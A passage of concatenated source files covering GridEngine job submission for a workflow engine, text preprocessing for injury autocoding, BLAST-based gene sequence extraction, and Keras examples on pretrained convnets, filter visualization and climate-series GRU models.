URIParser.parse(inputs[input_key])['chopped_path']
))
for param_key in parameters:
if param_key == 'output':
args.append('--output={}/{}'.format(
self._parsed_data_uris[self._source_context]\
['chopped_path'],
parameters['output']
))
else:
args.append('--{}={}'.format(
param_key, parameters[param_key]
))
        # add execution method
args.append('--exec_method={}'.format(self._step['execution']['method']))
# specify execution init commands if 'init' param given
if 'init' in self._step['execution']['parameters']:
args.append('--exec_init={}'.format(self._step['execution']['parameters']['init']))
Log.a().debug(
'[step.%s]: command: %s -> %s',
self._step['name'],
map_item['template']['output'],
' '.join(args)
)
# construct job name
name = 'gf-{}-{}-{}'.format(
map_item['attempt'],
slugify(self._step['name'], regex_pattern=r'[^-a-z0-9_]+'),
slugify(map_item['template']['output'], regex_pattern=r'[^-a-z0-9_]+')
)
# construct paths for logging stdout and stderr
log_path = '{}/_log/{}'.format(
self._parsed_data_uris[self._source_context]['chopped_path'],
name
)
# create and populate job template
jt = self._gridengine['drmaa_session'].createJobTemplate()
jt.remoteCommand = '/bin/bash'
jt.args = args
jt.jobName = name
jt.errorPath = ':{}.err'.format(log_path)
jt.outputPath = ':{}.out'.format(log_path)
# pass execution parameters to job template
native_spec = ''
if 'queue' in self._step['execution']['parameters']:
native_spec += ' -q {}'.format(
self._step['execution']['parameters']['queue']
)
if 'slots' in self._step['execution']['parameters']:
native_spec += ' -pe smp {}'.format(
self._step['execution']['parameters']['slots']
)
if 'other' in self._step['execution']['parameters']:
native_spec += ' {}'.format(
self._step['execution']['parameters']['other']
)
jt.nativeSpecification = native_spec
# submit hpc job using drmaa library
job_id = self._gridengine['drmaa_session'].runJob(jt)
self._gridengine['drmaa_session'].deleteJobTemplate(jt)
Log.a().debug(
'[step.%s]: hpc job id: %s -> %s',
self._step['name'],
map_item['template']['output'],
job_id
)
# record job info
map_item['run'][map_item['attempt']]['hpc_job_id'] = job_id
# set status of process
map_item['status'] = 'PENDING'
map_item['run'][map_item['attempt']]['status'] = 'PENDING'
return True
def run(self):
"""
        Submit a GridEngine job for each of the map items.
        Then store the job IDs in the run detail.
Args:
self: class instance.
Returns:
On success: True.
On failure: False.
"""
for map_item in self._map:
if not self._run_map(map_item):
msg = 'cannot run script for map item "{}"'\
.format(map_item['filename'])
Log.an().error(msg)
return self._fatal(msg)
self._update_status_db('RUNNING', '')
return True
def _serialize_detail(self):
"""
        Serialize map-reduce items.
        For GridEngine steps the map items are already serializable, so they are returned as-is.
Args:
self: class instance.
Returns:
A dict of all map items and their run histories.
"""
return self._map
def check_running_jobs(self):
"""
Check the status/progress of all map-reduce items and update _map status.
Args:
self: class instance.
Returns:
True.
"""
# check if jobs are running, finished, or failed
for map_item in self._map:
if map_item['status'] != 'FINISHED' and map_item['status'] != 'FAILED':
# can only get job status if it has not already been disposed with "wait"
status = self._gridengine['drmaa_session'].jobStatus(
map_item['run'][map_item['attempt']]['hpc_job_id']
)
map_item['status'] = self._job_status_map[status]
if map_item['status'] == 'FINISHED' or map_item['status'] == 'FAILED':
# check exit status
job_info = self._gridengine['drmaa_session'].wait(
map_item['run'][map_item['attempt']]['hpc_job_id'],
self._gridengine['drmaa_session'].TIMEOUT_NO_WAIT
)
Log.a().debug(
'[step.%s]: exit status: %s -> %s',
self._step['name'],
map_item['template']['output'],
job_info.exitStatus
)
if job_info.exitStatus > 0:
# job actually failed
map_item['status'] = 'FAILED'
map_item['run'][map_item['attempt']]['status'] = map_item['status']
if map_item['status'] == 'FAILED' and map_item['attempt'] < 5:
# retry job if not at limit
if not self.retry_failed(map_item):
Log.a().warning(
'[step.%s]: cannot retry failed gridengine job (%s)',
self._step['name'],
map_item['template']['output']
)
self._update_status_db(self._status, '')
return True
def retry_failed(self, map_item):
"""
Retry a job.
Args:
self: class instance.
Returns:
True if failed/stopped job restarted successfully
False if failed/stopped job not restarted due to error
"""
# retry job
Log.some().info(
'[step.%s]: retrying gridengine job (%s), attempt number %s',
self._step['name'],
map_item['template']['output'],
map_item['attempt']+1
)
# add another run to list
map_item['attempt'] += 1
map_item['run'].append({})
if not self._run_map(map_item):
Log.a().warning(
'[step.%s]: cannot retry gridengine job (%s), attempt number %s',
self._step['name'],
map_item['template']['output'],
map_item['attempt']
)
return False
return True
``` |
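The step expects a `gridengine` context dict that already holds a live DRMAA session (see `self._gridengine['drmaa_session']` above). A hedged sketch of how that context might be wired up is below; the commented constructor arguments are placeholders, not the actual GeneFlow call sites.
```python
# Sketch only: create a DRMAA session and hand it to a GridengineStep.
import drmaa

session = drmaa.Session()
session.initialize()
try:
    gridengine_context = {'drmaa_session': session}
    # step = GridengineStep(job, step_def, app, inputs, parameters, config,
    #                       depend_uris, data_uris, 'local',
    #                       gridengine=gridengine_context)
    # if step.initialize():
    #     step.run()                  # submits one GridEngine job per map item
    #     step.check_running_jobs()
    pass
finally:
    session.exit()
```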
{
"source": "82ndAirborneDiv/injury-autocoding",
"score": 3
} |
#### File: injury-autocoding/src/preprocessing.py
```python
import argparse
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from tools.text import clean_text
def parse_arguments(parser):
parser.add_argument('--data_dir', type=str, default='C:/data/niosh_ifund/')
parser.add_argument('--test_file', type=str, default='test.csv')
parser.add_argument('--train_file', type=str, default='train.csv')
args = parser.parse_args()
return args
if __name__ == '__main__':
parser = argparse.ArgumentParser()
args = parse_arguments(parser)
# Importing the raw data
train = pd.read_csv(args.data_dir + args.train_file,
usecols=['text', 'event'])
test = pd.read_csv(args.data_dir + args.test_file,
usecols=['text'])
# Adding a random identifier for the BERT scripts
num_train = train.shape[0]
num_test = test.shape[0]
num_records = num_train + num_test
ids = np.array([''.join(['record', str(num)])
for num in list(range(num_records))])
np.random.shuffle(ids)
train['id'] = ids[0:num_train]
test['id'] = ids[num_train:]
# Lowercasing and adding spaces around common abbreviations;
# only fixes a few things
train.text = pd.Series(clean_text(train.text))
test.text = pd.Series(clean_text(test.text))
# Clipping the docs to the max length
train_lengths = np.array([len(doc.split()) for doc in
pd.concat([train.text, test.text])])
test_lengths = np.array([len(doc.split()) for doc in
pd.concat([train.text, test.text])])
clip_to = np.min([np.max(train_lengths), np.max(test_lengths)])
train.text = pd.Series([' '.join(doc.split()[:clip_to])
for doc in train.text])
test.text = pd.Series([' '.join(doc.split()[:clip_to])
for doc in test.text])
pd.Series(clip_to).to_csv(args.data_dir + 'clip_to.csv',
header=False, index=False)
# Making a lookup dictionary for the event codes
code_df = pd.read_csv(args.data_dir + 'code_descriptions.csv')
codes = code_df.event.values
code_dict = dict(zip(codes, np.arange(len(codes))))
train.event = [code_dict[code] for code in train.event]
# Saving the code dict to disk
code_df = pd.DataFrame.from_dict(code_dict, orient='index')
code_df['event_code'] = code_df.index
code_df.columns = ['value', 'event_code']
code_df.to_csv(args.data_dir + 'code_dict.csv', index=False)
# Rearranging the columns for BERT
train['filler'] = np.repeat('a', train.shape[0])
test['filler'] = np.repeat('a', test.shape[0])
train = train[['id', 'event', 'filler', 'text']]
test = test[['id', 'text']]
# Shuffling the rows
train = train.sample(frac=1)
# Writing the regular splits to disk
train.to_csv(args.data_dir + 'train.tsv', sep='\t',
index=False, header=False)
test.to_csv(args.data_dir + 'test.tsv', sep='\t',
index=False, header=True)
``` |
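Once training is done, the `code_dict.csv` written above can map integer predictions back to event codes. A minimal sketch, assuming the default `data_dir` used in this script and hypothetical model outputs:
```python
import pandas as pd

code_df = pd.read_csv('C:/data/niosh_ifund/code_dict.csv')         # columns: value, event_code
value_to_event = dict(zip(code_df.value, code_df.event_code))
predicted_labels = [0, 3, 3, 1]                                    # hypothetical model outputs
predicted_events = [value_to_event[v] for v in predicted_labels]
print(predicted_events)
```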
{
"source": "82ndAirborneDiv/LpSubP",
"score": 2
} |
#### File: 82ndAirborneDiv/LpSubP/getsequences.py
```python
import os
import subprocess
import sys
script=sys.argv[0]
base_dir=sys.argv[1]+"/prod_fasta/"
coregenome_dir=sys.argv[1]+"../coregene/"
os.chdir(base_dir)
def MakeBlastDB():
os.system("mkdir output")
for genome in os.listdir('.'):
genome=os.path.join(base_dir,genome)
base=os.path.basename(genome)
basename=base.split(".")[0]
subprocess.call(["makeblastdb","-in",genome,"-dbtype","nucl","-out","./output"+"/"+basename])
MakeBlastDB()
child_processes=[]
def RunBlast():
os.system("mkdir blastoutput")
for query in os.listdir(coregenome_dir):
if query.endswith(".fasta"):
query=os.path.join(coregenome_dir,query)
baseq=os.path.basename(query)
filename =os.path.splitext(baseq)[0]
for database in os.listdir(base_dir+"/output"):
database=os.path.join(base_dir+"/output",database)
basedb=os.path.basename(database)
print(basedb)
dbname=basedb.split(".")[0]
databasename =os.path.join(base_dir+"/output",basedb.split(".")[0])
p=subprocess.Popen(["blastn","-query",query,"-db",databasename,"-outfmt","6 qseqid sseqid pident qlen qstart qend sstart send","-out","./blastoutput"+"/"+filename+"_"+dbname+".blast"])
child_processes.append(p)
for cp in child_processes:
cp.wait()
RunBlast()
print("blast is done")
os.chdir(base_dir+"/blastoutput")
def filter():
os.system("mkdir sorted_blast_pair")
for blastresult in os.listdir('.'):
if blastresult.endswith(".blast"):
genomename=os.path.basename(blastresult)
blastresult=open(blastresult)
for line in blastresult:
try:
gene={}
line = line.split( )
qseqid=line[0]
sseqid=line[1]
pident=float(line[2])
qlength=float(line[3])
qstart=float(line[4])
qend=float(line[5])
sstart=float(line[6])
send=float(line[7])
if (pident>85) & (((qend-qstart+1)/qlength)>0.75) :
gene[qseqid]=sseqid
for key in gene:
with open("./sorted_blast_pair"+"/"+key+"_"+genomename+".pair","w") as ofile:
ofile.write(key+"\t"+gene.get(key))
ofile.close
except IOError:
print("no input")
blastresult.close()
filter()
print("Filtering blast result is done")
####GetSequence#####
os.chdir(base_dir)
os.system("mkdir seqrecords")
def Parse(filename,seqs):
file = open(filename)
seqs={}
name = ''
for line in file:
line = line.rstrip()
if line.startswith('>'):
name=line.replace('>',"")
seqs[name] = ''
else:
seqs[name] = seqs[name] + line
    file.close()
return seqs
seqs={}
for genome in os.listdir('.'):
if genome.endswith(".fasta"):
seqs=dict(seqs,**Parse(genome,seqs))
for file in os.listdir(base_dir+'/blastoutput/sorted_blast_pair'):
genomename=file.split("_")[2]
file=open(os.path.join(base_dir+'/blastoutput/sorted_blast_pair',file))
for line in file:
genename=line.split("\t")[1]+" "
coregenename=line.split("\t")[0]
for key in seqs:
if key.find(str(genename))!= -1:
with open("./seqrecords"+"/"+coregenename+"_"+genename+"_"+genomename+".fasta","w") as ofile:
ofile.write(">"+coregenename+"_"+genename+"_"+genomename+"\n"+seqs.get(key))
ofile.close()
file.close()
print("Getting sequences are done")
os.chdir(base_dir+'/seqrecords')
os.system('mkdir pergene_seqrecords')
genelist=open(os.path.join(sys.argv[1]+"../",'new_49gene.list'))
for gene in genelist:
gene=gene.rstrip()
for seqrecord in os.listdir("."):
if seqrecord.startswith(gene):
seq=open(os.path.join(base_dir+'/seqrecords',seqrecord))
for seqline in seq:
seqline=seqline.rstrip()
with open("./pergene_seqrecords"+"/"+gene+"_"+"unaligned"+".fasta","a") as pfile:
pfile.write(seqline+"\n")
pfile.close
seq.close()
genelist.close()
print("Sequences are sorted by each locus")
#####PRESENCE/ABSENCE#####
os.chdir(base_dir)
filelist1=os.listdir(base_dir+"/blastoutput")
filelist2=os.listdir(base_dir+"/blastoutput/sorted_blast_pair")
sys.stdout=open('test','a')
for beforefile in filelist1:
if beforefile.endswith(".blast"):
base=beforefile.split(".")[0]
coregenename=base.split("_")[0]
genomename=base.split("_")[1]
if str(filelist2).find(str(beforefile))!= -1:
sys.stdout.write(coregenename+"\t"+genomename+"\t"+"yes"+"\n")
else:
sys.stdout.write(coregenename+"\t"+genomename+"\t"+"no"+"\n")
sys.stdout.close()
test=open("test")
no=open("notest",'a')
for line in test:
line=line.rstrip()
core=line.split()[0]
subject=line.split()[1]
if (line.startswith("lpg")) & (line.find("no")!= -1):
for blastresult in filelist1:
if blastresult.startswith(core+"_"+subject):
f=open(os.path.join(base_dir+"/blastoutput",blastresult))
no.write(line+"\t"+str(f.readlines()).replace("t","").replace("n","")+"\n")
no.close()
``` |
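The hand-rolled `Parse()` above builds a header-to-sequence dict; Biopython can do the same in a couple of lines, which may be a useful cross-check (the filename below is a placeholder):
```python
from Bio import SeqIO

# rec.description is the FASTA header without the leading '>', matching Parse()'s keys.
seqs = {rec.description: str(rec.seq) for rec in SeqIO.parse("genome.fasta", "fasta")}
```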
{
"source": "83286415/DeepLearningWithPythonKeras",
"score": 3
} |
#### File: 83286415/DeepLearningWithPythonKeras/5.3.1-using-a-pretrained-convnet-with-feature-extraction.py
```python
import keras
print(keras.__version__) # 2.2.4
from keras.applications import VGG16
# pre-trained network
conv_base = VGG16(weights='imagenet',
include_top=False, # no Dense layer included
input_shape=(150, 150, 3))
print(conv_base.summary())
'''
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
input_1 (InputLayer) (None, 150, 150, 3) 0
_________________________________________________________________
block1_conv1 (Conv2D) (None, 150, 150, 64) 1792
_________________________________________________________________
block1_conv2 (Conv2D) (None, 150, 150, 64) 36928
_________________________________________________________________
block1_pool (MaxPooling2D) (None, 75, 75, 64) 0
_________________________________________________________________
block2_conv1 (Conv2D) (None, 75, 75, 128) 73856
_________________________________________________________________
block2_conv2 (Conv2D) (None, 75, 75, 128) 147584
_________________________________________________________________
block2_pool (MaxPooling2D) (None, 37, 37, 128) 0
_________________________________________________________________
block3_conv1 (Conv2D) (None, 37, 37, 256) 295168
_________________________________________________________________
block3_conv2 (Conv2D) (None, 37, 37, 256) 590080
_________________________________________________________________
block3_conv3 (Conv2D) (None, 37, 37, 256) 590080
_________________________________________________________________
block3_pool (MaxPooling2D) (None, 18, 18, 256) 0
_________________________________________________________________
block4_conv1 (Conv2D) (None, 18, 18, 512) 1180160
_________________________________________________________________
block4_conv2 (Conv2D) (None, 18, 18, 512) 2359808
_________________________________________________________________
block4_conv3 (Conv2D) (None, 18, 18, 512) 2359808
_________________________________________________________________
block4_pool (MaxPooling2D) (None, 9, 9, 512) 0
_________________________________________________________________
block5_conv1 (Conv2D) (None, 9, 9, 512) 2359808
_________________________________________________________________
block5_conv2 (Conv2D) (None, 9, 9, 512) 2359808
_________________________________________________________________
block5_conv3 (Conv2D) (None, 9, 9, 512) 2359808
_________________________________________________________________
block5_pool (MaxPooling2D) (None, 4, 4, 512) 0
=================================================================
Total params: 14,714,688
Trainable params: 14,714,688
Non-trainable params: 0
_________________________________________________________________
'''
# 5.3.1.1 feature extraction without data augmentation
import os
import numpy as np
from keras.preprocessing.image import ImageDataGenerator
base_dir = 'D:/AI/deep-learning-with-python-notebooks-master/cats_and_dogs_small'
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')
test_dir = os.path.join(base_dir, 'test')
datagen = ImageDataGenerator(rescale=1./255)
# All images will be rescaled by 1./255, so pixel values originally in [0, 255] end up in [0, 1]
batch_size = 20
def extract_features(directory, sample_count):
features = np.zeros(shape=(sample_count, 4, 4, 512)) # make zero matrix for features extracted below
labels = np.zeros(shape=(sample_count))
generator = datagen.flow_from_directory(
directory,
target_size=(150, 150),
batch_size=batch_size, # 20, defined outside this def
class_mode='binary')
i = 0
for inputs_batch, labels_batch in generator: # loops in images dir and never stops, so need a break below
features_batch = conv_base.predict(inputs_batch)
features[i * batch_size : (i + 1) * batch_size] = features_batch # map the feature's map to features matrix
labels[i * batch_size : (i + 1) * batch_size] = labels_batch
i += 1
if i * batch_size >= sample_count: # the sample images count in dirs
# Note that since generators yield data indefinitely in a loop,
# we must `break` after every image has been seen once.
break
return features, labels
train_features, train_labels = extract_features(train_dir, 2000)
validation_features, validation_labels = extract_features(validation_dir, 1000)
test_features, test_labels = extract_features(test_dir, 1000)
# Dense layer needs 3D -> 1D, so reshape feature matrix to (sample_count, 8192), and this 8192=4*4*512
train_features = np.reshape(train_features, (2000, 4 * 4 * 512)) # 4, 4, 512: the last MaxPooling2D layer output
validation_features = np.reshape(validation_features, (1000, 4 * 4 * 512))
test_features = np.reshape(test_features, (1000, 4 * 4 * 512))
# build network with pre-trained network
from keras import models
from keras import layers
from keras import optimizers
model = models.Sequential()
model.add(layers.Dense(256, activation='relu', input_dim=4 * 4 * 512))
model.add(layers.Dropout(0.5))
model.add(layers.Dense(1, activation='sigmoid'))
model.compile(optimizer=optimizers.RMSprop(lr=2e-5),
loss='binary_crossentropy',
metrics=['acc'])
history = model.fit(train_features, train_labels,
epochs=30,
batch_size=20,
validation_data=(validation_features, validation_labels))
# plot
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.legend()
plt.figure()
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
# plt.show() # commented it out for running code below
print('5.3.1.1 done')
print('---------------------------------------------------------------------------------------------------------------')
# 5.3.1.2 feature extraction with data augmentation
# if no GPU supports, do not try this way
model = models.Sequential()
model.add(conv_base) # add pre-trained network model into this model
model.add(layers.Flatten())
model.add(layers.Dense(256, activation='relu'))
model.add(layers.Dense(1, activation='sigmoid'))
print(model.summary())
'''
Layer (type) Output Shape Param #
=================================================================
vgg16 (Model) (None, 4, 4, 512) 14714688
_________________________________________________________________
flatten_1 (Flatten) (None, 8192) 0
_________________________________________________________________
dense_3 (Dense) (None, 256) 2097408
_________________________________________________________________
dense_4 (Dense) (None, 1) 257
=================================================================
Total params: 16,812,353
Trainable params: 16,812,353
Non-trainable params: 0
_________________________________________________________________
'''
# freezing con_base's weights
print('This is the number of trainable weights '
'before freezing the conv base:', len(model.trainable_weights)) # output: 30
conv_base.trainable = False # then compile the model so that this change takes effect
print('This is the number of trainable weights '
'after freezing the conv base:', len(model.trainable_weights)) # output: 4
# make train data generator (only) with data augmentation
train_datagen = ImageDataGenerator(
rescale=1./255,
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest')
# Note that the validation data should not be augmented!
test_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
# This is the target directory
train_dir,
# All images will be resized to 150x150
target_size=(150, 150),
batch_size=20,
# Since we use binary_crossentropy loss, we need binary labels
class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
validation_dir,
target_size=(150, 150),
batch_size=20,
class_mode='binary')
model.compile(loss='binary_crossentropy',
optimizer=optimizers.RMSprop(lr=2e-5),
metrics=['acc'])
history = model.fit_generator(
train_generator,
steps_per_epoch=100,
epochs=30,
validation_data=validation_generator,
validation_steps=50,
verbose=2)
model.save('cats_and_dogs_small_3_feature_extraction_with_data_augmentation.h5')
# plot
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy_2')
plt.legend()
plt.figure()
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss_2')
plt.legend()
plt.show()
'''it costs 8 hours to run this model fit
Epoch 1/30
- 814s - loss: 0.5846 - acc: 0.7055 - val_loss: 0.4523 - val_acc: 0.8140
Epoch 2/30
- 844s - loss: 0.4821 - acc: 0.7785 - val_loss: 0.3697 - val_acc: 0.8550
Epoch 3/30
- 882s - loss: 0.4210 - acc: 0.8185 - val_loss: 0.3524 - val_acc: 0.8580
Epoch 4/30
- 914s - loss: 0.3949 - acc: 0.8325 - val_loss: 0.3277 - val_acc: 0.8530
Epoch 5/30
- 878s - loss: 0.3815 - acc: 0.8355 - val_loss: 0.2894 - val_acc: 0.8850
Epoch 6/30
- 865s - loss: 0.3618 - acc: 0.8390 - val_loss: 0.2870 - val_acc: 0.8900
Epoch 7/30
- 863s - loss: 0.3670 - acc: 0.8340 - val_loss: 0.2894 - val_acc: 0.8760
Epoch 8/30
- 937s - loss: 0.3493 - acc: 0.8455 - val_loss: 0.2716 - val_acc: 0.8980
Epoch 9/30
- 879s - loss: 0.3399 - acc: 0.8515 - val_loss: 0.2646 - val_acc: 0.8980
Epoch 10/30
- 895s - loss: 0.3327 - acc: 0.8545 - val_loss: 0.2598 - val_acc: 0.8960
Epoch 11/30
- 854s - loss: 0.3266 - acc: 0.8540 - val_loss: 0.2555 - val_acc: 0.9020
Epoch 12/30
- 856s - loss: 0.3341 - acc: 0.8510 - val_loss: 0.2535 - val_acc: 0.8980
Epoch 13/30
- 854s - loss: 0.3189 - acc: 0.8600 - val_loss: 0.2554 - val_acc: 0.8970
Epoch 14/30
- 849s - loss: 0.3167 - acc: 0.8620 - val_loss: 0.2493 - val_acc: 0.9020
Epoch 15/30
- 839s - loss: 0.3256 - acc: 0.8490 - val_loss: 0.2465 - val_acc: 0.9010
Epoch 16/30
- 840s - loss: 0.3118 - acc: 0.8645 - val_loss: 0.2456 - val_acc: 0.9040
Epoch 17/30
- 841s - loss: 0.3114 - acc: 0.8635 - val_loss: 0.2464 - val_acc: 0.9030
Epoch 18/30
- 841s - loss: 0.3045 - acc: 0.8690 - val_loss: 0.2478 - val_acc: 0.9010
Epoch 19/30
- 845s - loss: 0.3112 - acc: 0.8605 - val_loss: 0.2468 - val_acc: 0.8990
Epoch 20/30
- 843s - loss: 0.2951 - acc: 0.8735 - val_loss: 0.2412 - val_acc: 0.9030
Epoch 21/30
- 840s - loss: 0.3061 - acc: 0.8715 - val_loss: 0.2403 - val_acc: 0.9060
Epoch 22/30
- 866s - loss: 0.2909 - acc: 0.8750 - val_loss: 0.2405 - val_acc: 0.9050
Epoch 23/30
- 912s - loss: 0.2976 - acc: 0.8690 - val_loss: 0.2448 - val_acc: 0.9030
Epoch 24/30
- 838s - loss: 0.3001 - acc: 0.8730 - val_loss: 0.2451 - val_acc: 0.8990
Epoch 25/30
- 833s - loss: 0.2876 - acc: 0.8720 - val_loss: 0.2382 - val_acc: 0.9030
Epoch 26/30
- 845s - loss: 0.2913 - acc: 0.8775 - val_loss: 0.2415 - val_acc: 0.9020
Epoch 27/30
- 915s - loss: 0.2986 - acc: 0.8725 - val_loss: 0.2370 - val_acc: 0.9060
Epoch 28/30
- 968s - loss: 0.2830 - acc: 0.8735 - val_loss: 0.2423 - val_acc: 0.9000
Epoch 29/30
- 1004s - loss: 0.2853 - acc: 0.8840 - val_loss: 0.2483 - val_acc: 0.9020
Epoch 30/30
- 1046s - loss: 0.2865 - acc: 0.8770 - val_loss: 0.2416 - val_acc: 0.9030
'''
print('5.3.1.2 done')
print('---------------------------------------------------------------------------------------------------------------')
```
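A short usage sketch for the model saved above: load it back and score a single image with the same 150x150 preprocessing. The image path is a placeholder, and the class index follows `flow_from_directory`'s alphabetical ordering (cats=0, dogs=1).
```python
from keras.models import load_model
from keras.preprocessing import image
import numpy as np

model = load_model('cats_and_dogs_small_3_feature_extraction_with_data_augmentation.h5')
img = image.load_img('some_cat_or_dog.jpg', target_size=(150, 150))   # placeholder path
x = np.expand_dims(image.img_to_array(img) / 255., axis=0)            # shape (1, 150, 150, 3)
prob = model.predict(x)[0][0]                                          # sigmoid output
print('P(class 1, i.e. dog) = {:.3f}'.format(prob))
```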
#### File: 83286415/DeepLearningWithPythonKeras/5.4.2-visualizing-convnets-filters.py
```python
import keras
print(keras.__version__) # 2.2.4
from keras.applications import VGG16 # import the network model trained
from keras import backend as K # backend: tensorflow. refer to https://keras.io/zh/backend/#keras
# show one filter's visualization
model = VGG16(weights='imagenet',
include_top=False) # no Dense layer included
layer_name = 'block3_conv1'
filter_index = 0
layer_output = model.get_layer(layer_name).output # Tensor("block3_conv1/Relu:0", shape=(?, ?, ?, 256), dtype=float32)
loss = K.mean(layer_output[:, :, :, filter_index]) # return the tensor of the first filter's mean, a int
# loss: Tensor("Mean:0", shape=(), dtype=float32)
# K.mean is the tensorflow.reduce_mean(); refer to https://www.cnblogs.com/yuzhuwei/p/6986171.html
# The call to `gradients` returns a list of tensors (of size 1 in this case)
# hence we only keep the first element -- which is a tensor.
grads = K.gradients(loss, model.input)[0] # refer to tf.gradients()
# We add 1e-5 before dividing so as to avoid accidentally dividing by 0.
grads /= (K.sqrt(K.mean(K.square(grads))) + 1e-5)
iterate = K.function([model.input], [loss, grads]) # make iterate a instance with input and output scheduled
# refer to book P137
# Let's test it:
import numpy as np
loss_value, grads_value = iterate([np.zeros((1, 150, 150, 3))])
def deprocess_image(x):
# normalize tensor: center on 0., ensure std is 0.1
x -= x.mean()
x /= (x.std() + 1e-5)
x *= 0.1
# clip to [0, 1]
x += 0.5
x = np.clip(x, 0, 1)
# convert to RGB array
x *= 255
x = np.clip(x, 0, 255).astype('uint8')
return x # x is in [0, 255]
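# (Added illustration, not part of the original notebook.) A quick sanity check of
# deprocess_image(): it returns a uint8 RGB array with values clipped to [0, 255].
_demo = deprocess_image(np.random.randn(150, 150, 3))
print(_demo.dtype, _demo.min(), _demo.max())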
# put all pieces above into one function
def generate_pattern(layer_name, filter_index, size=150):
# Build a loss function that maximizes the activation
# of the nth filter of the layer considered.
layer_output = model.get_layer(layer_name).output
loss = K.mean(layer_output[:, :, :, filter_index])
# Compute the gradient of the input picture wrt this loss
grads = K.gradients(loss, model.input)[0]
# Normalization trick: we normalize the gradient
grads /= (K.sqrt(K.mean(K.square(grads))) + 1e-5) # 1e-5 in case divided by 0
# This function returns the loss and grads given the input picture
iterate = K.function([model.input], [loss, grads])
# We start from a gray image with some noise
    input_img_data = np.random.random((1, size, size, 3)) * 20 + 128. # start from a gray image (value 128) with small random noise
    # this yields an array of shape (1, 150, 150, 3) with values around 128
# Run gradient ascent for 40 steps
step = 1.
for i in range(40):
        loss_value, grads_value = iterate([input_img_data]) # iterate is defined above; its inputs and outputs are declared there
input_img_data += grads_value * step # gradient rise
img = input_img_data[0]
return deprocess_image(img)
# plot
import matplotlib.pyplot as plt
plt.imshow(generate_pattern('block3_conv1', 0))
plt.show()
print('5.4.2 show one filter"s visualization done')
print('---------------------------------------------------------------------------------------------------------------')
# show the first 64 filters's visualization of each convnet network's first layer
for layer_name in ['block1_conv1', 'block2_conv1', 'block3_conv1', 'block4_conv1']:
size = 64
margin = 5
# This a empty (black) image where we will store our results.
results = np.zeros((8 * size + 7 * margin, 8 * size + 7 * margin, 3))
for i in range(8): # iterate over the rows of our results grid
for j in range(8): # iterate over the columns of our results grid
# Generate the pattern for filter `i + (j * 8)` in `layer_name`
filter_img = generate_pattern(layer_name, i + (j * 8), size=size) # generate_pattern defined above
# Put the result in the square `(i, j)` of the results grid
horizontal_start = i * size + i * margin
horizontal_end = horizontal_start + size
vertical_start = j * size + j * margin
vertical_end = vertical_start + size
results[horizontal_start: horizontal_end, vertical_start: vertical_end, :] = filter_img
# Display the results grid
plt.figure(figsize=(20, 20))
plt.imshow(results)
plt.show()
print('5.4.2 show the first 64 filters"s visualization of each convnet network"s first layer done')
print('---------------------------------------------------------------------------------------------------------------')
```
#### File: 83286415/DeepLearningWithPythonKeras/6.3.6-recurrent-dropout-to-fight-overfitting.py
```python
import keras
print(keras.__version__) # 2.1.6
import os
# prepare the climate data
base_dir = 'D:/AI/deep-learning-with-python-notebooks-master'
climate_dir = os.path.join(base_dir, 'jena_climate')
fname = os.path.join(climate_dir, 'jena_climate_2009_2016.csv')
f = open(fname)
data = f.read()
f.close()
# CSV file read
lines = data.split('\n')
header = lines[0].split(',')
lines = lines[1:] # title is not included
# data analysis
import numpy as np
float_data = np.zeros((len(lines), len(header) - 1)) # len(header)-1: data time is not included
for i, line in enumerate(lines):
values = [float(x) for x in line.split(',')[1:]]
float_data[i, :] = values # put values of climate data into float_date list without data time
# without standardization, loss will be 4+
mean = float_data[:200000].mean(axis=0)
float_data -= mean
std = float_data[:200000].std(axis=0)
float_data /= std
def generator(data, lookback, delay, min_index, max_index,
shuffle=False, batch_size=128, step=6):
if max_index is None:
max_index = len(data) - delay - 1
i = min_index + lookback
while 1:
if shuffle:
rows = np.random.randint(
min_index + lookback, max_index, size=batch_size)
else:
if i + batch_size >= max_index:
i = min_index + lookback
rows = np.arange(i, min(i + batch_size, max_index))
i += len(rows)
samples = np.zeros((len(rows),
lookback // step,
data.shape[-1]))
targets = np.zeros((len(rows),))
for j, row in enumerate(rows):
indices = range(rows[j] - lookback, rows[j], step)
samples[j] = data[indices]
targets[j] = data[rows[j] + delay][1]
yield samples, targets
lookback = 1440
step = 6
delay = 144
batch_size = 128
train_gen = generator(float_data,
lookback=lookback,
delay=delay,
min_index=0,
max_index=200000,
shuffle=True,
step=step,
batch_size=batch_size)
val_gen = generator(float_data,
lookback=lookback,
delay=delay,
min_index=200001,
max_index=300000,
step=step,
batch_size=batch_size)
test_gen = generator(float_data,
lookback=lookback,
delay=delay,
min_index=300001,
max_index=None,
step=step,
batch_size=batch_size)
# This is how many steps to draw from `val_gen`
# in order to see the whole validation set:
val_steps = (300000 - 200001 - lookback) // batch_size
# This is how many steps to draw from `test_gen`
# in order to see the whole test set:
test_steps = (len(float_data) - 300001 - lookback) // batch_size
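# (Added sanity check, not in the original listing.) One batch drawn from the generator
# has shape (batch_size, lookback // step, n_features) = (128, 240, 14) for this dataset.
sample_batch, sample_targets = next(train_gen)
print(sample_batch.shape, sample_targets.shape)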
print('prepare the climate data done')
print('---------------------------------------------------------------------------------------------------------------')
# 6.3.6 recurrent dropout against overfitting
# build network model
from keras.models import Sequential
from keras import layers
from keras.optimizers import RMSprop
model = Sequential()
model.add(layers.GRU(32,
